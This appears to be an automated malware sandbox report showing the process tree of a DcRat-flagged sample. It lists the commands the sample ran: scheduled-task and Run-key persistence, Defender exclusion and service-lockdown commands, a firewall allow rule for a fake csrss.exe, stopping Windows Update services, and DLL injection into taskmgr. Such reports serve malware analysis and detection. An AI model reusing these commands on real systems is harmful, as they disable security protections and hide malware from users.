PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 4696 wrote to memory of 3020	4696	894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe	88
PID 2556 wrote to memory of 4984	2556	Explorer.EXE	100
PID 2556 wrote to memory of 4984	2556	Explorer.EXE	100
PID 2556 wrote to memory of 4984	2556	Explorer.EXE	100
PID 4984 wrote to memory of 3284	4984	C1E8.exe	101
PID 4984 wrote to memory of 3284	4984	C1E8.exe	101
PID 4984 wrote to memory of 3284	4984	C1E8.exe	101
PID 2556 wrote to memory of 4168	2556	Explorer.EXE	102
PID 2556 wrote to memory of 4168	2556	Explorer.EXE	102
PID 2556 wrote to memory of 4168	2556	Explorer.EXE	102
PID 3284 wrote to memory of 1104	3284	ZI4xM2Zd.exe	103
PID 3284 wrote to memory of 1104	3284	ZI4xM2Zd.exe	103
PID 3284 wrote to memory of 1104	3284	ZI4xM2Zd.exe	103
PID 1104 wrote to memory of 5020	1104	pG3rS0fl.exe	104
PID 1104 wrote to memory of 5020	1104	pG3rS0fl.exe	104
PID 1104 wrote to memory of 5020	1104	pG3rS0fl.exe	104
PID 5020 wrote to memory of 4296	5020	Hf8Mh2Uh.exe	105
PID 5020 wrote to memory of 4296	5020	Hf8Mh2Uh.exe	105
PID 5020 wrote to memory of 4296	5020	Hf8Mh2Uh.exe	105
PID 4296 wrote to memory of 3568	4296	Lq5hq4TW.exe	136
PID 4296 wrote to memory of 3568	4296	Lq5hq4TW.exe	136
PID 4296 wrote to memory of 3568	4296	Lq5hq4TW.exe	136
PID 2556 wrote to memory of 3708	2556	Explorer.EXE	107
PID 2556 wrote to memory of 3708	2556	Explorer.EXE	107
PID 2556 wrote to memory of 3708	2556	Explorer.EXE	107
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 4168 wrote to memory of 3804	4168	C370.exe	108
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 3568 wrote to memory of 3472	3568	cmd.exe	110
PID 2556 wrote to memory of 4540	2556	Explorer.EXE	113
PID 2556 wrote to memory of 4540	2556	Explorer.EXE	113
PID 2556 wrote to memory of 4540	2556	Explorer.EXE	113
PID 3708 wrote to memory of 4308	3708	C45B.bat	116
PID 3708 wrote to memory of 4308	3708	C45B.bat	116
PID 2556 wrote to memory of 4696	2556	Explorer.EXE	117
PID 2556 wrote to memory of 4696	2556	Explorer.EXE	117
PID 2556 wrote to memory of 1656	2556	Explorer.EXE	119
PID 2556 wrote to memory of 1656	2556	Explorer.EXE	119
PID 2556 wrote to memory of 1656	2556	Explorer.EXE	119
PID 4296 wrote to memory of 3220	4296	Lq5hq4TW.exe	121

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556
- C:\Users\Admin\AppData\Local\Temp\894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe
  "C:\Users\Admin\AppData\Local\Temp\894629cee13f03cb0253031c238a4389bd6902202d1412656a1c1f0ee8f5b33c.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4696
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:4140
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - DcRat
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:3020
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 268
    3⤵
    - Program crash
    PID:1096
- C:\Users\Admin\AppData\Local\Temp\C1E8.exe
  C:\Users\Admin\AppData\Local\Temp\C1E8.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:4984
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3284
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pG3rS0fl.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Hf8Mh2Uh.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:5020
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Lq5hq4TW.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1WK02es6.exe
        7⤵
        
        PID:3568
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:3472
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 572
        8⤵
        Program crash
        
        PID:2788
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2NB190Af.exe
        7⤵
        Executes dropped EXE
        
        PID:3220
- C:\Users\Admin\AppData\Local\Temp\C370.exe
  C:\Users\Admin\AppData\Local\Temp\C370.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4168
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3804
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 388
    3⤵
    - Program crash
    PID:2148
- C:\Users\Admin\AppData\Local\Temp\C45B.bat
  "C:\Users\Admin\AppData\Local\Temp\C45B.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C5E0.tmp\C5E1.tmp\C5E2.bat C:\Users\Admin\AppData\Local\Temp\C45B.bat"
    3⤵
    PID:4308
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:1500
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffab6aa46f8,0x7ffab6aa4708,0x7ffab6aa4718
        5⤵
        
        PID:3792
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
        5⤵
        
        PID:2708
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
        5⤵
        
        PID:2004
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3000 /prefetch:8
        5⤵
        
        PID:2592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3564 /prefetch:1
        5⤵
        
        PID:1556
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:1
        5⤵
        
        PID:4764
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:1
        5⤵
        
        PID:2744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
        5⤵
        
        PID:404
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
        5⤵
        
        PID:760
    - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5768 /prefetch:8
        5⤵
        
        PID:1800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
        5⤵
        
        PID:3064
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4336 /prefetch:1
        5⤵
        
        PID:3276
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
        5⤵
        
        PID:5200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,2919452782734834428,8193456488464534630,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
        5⤵
        
        PID:5192
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:2488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab6aa46f8,0x7ffab6aa4708,0x7ffab6aa4718
        5⤵
        
        PID:1408
- C:\Users\Admin\AppData\Local\Temp\C854.exe
  C:\Users\Admin\AppData\Local\Temp\C854.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 388
    3⤵
    - Program crash
    PID:4516
- C:\Users\Admin\AppData\Local\Temp\C96E.exe
  C:\Users\Admin\AppData\Local\Temp\C96E.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:4696
- C:\Users\Admin\AppData\Local\Temp\CB25.exe
  C:\Users\Admin\AppData\Local\Temp\CB25.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:1656
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:4932
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      DcRat
      Creates scheduled task(s)
      PID:2376
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:1148
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:4620
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:3332
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3568
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:4292
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:R" /E
        5⤵
        
        PID:4968
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      4⤵
      Loads dropped DLL
      PID:4544
- C:\Users\Admin\AppData\Local\Temp\F24.exe
  C:\Users\Admin\AppData\Local\Temp\F24.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5456
- - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
    "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:5572
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      Executes dropped EXE
      Checks SCSI registry key(s)
      Suspicious behavior: MapViewOfSection
      PID:5852
- - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
    "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
    3⤵
    - Executes dropped EXE
    PID:5632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5992
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Checks for VirtualBox DLLs, possible anti-VM trick
      Drops file in Windows directory
      Modifies data under HKEY_USERS
      PID:1504
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:3692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5588
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5568
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:5548
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4756
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        Executes dropped EXE
        
        PID:5748
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:1180
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:3120
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:3200
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:624
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Modifies data under HKEY_USERS
        
        PID:5188
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Drops file in Program Files directory
        
        PID:5768
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        DcRat
        Creates scheduled task(s)
        
        PID:4988
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:3848
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:2476
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:5372
- - C:\Users\Admin\AppData\Local\Temp\source1.exe
    "C:\Users\Admin\AppData\Local\Temp\source1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:5696
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:5592
- - C:\Users\Admin\AppData\Local\Temp\latestX.exe
    "C:\Users\Admin\AppData\Local\Temp\latestX.exe"
    3⤵
    - Executes dropped EXE
    PID:5768
- C:\Users\Admin\AppData\Local\Temp\3FCA.exe
  C:\Users\Admin\AppData\Local\Temp\3FCA.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:6052
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6052 -s 792
    3⤵
    - Program crash
    PID:5684
- C:\Users\Admin\AppData\Local\Temp\423C.exe
  C:\Users\Admin\AppData\Local\Temp\423C.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:732
- C:\Users\Admin\AppData\Local\Temp\43A5.exe
  C:\Users\Admin\AppData\Local\Temp\43A5.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:5520
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5492
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5420
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5172
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:5056
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2824
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3300
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3652
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:6076
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2664
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:5188
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:5516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
  2⤵
  PID:1480
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:3064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  PID:1600
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:844
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4480
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1396
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:636
- - C:\Windows\System32\sc.exe
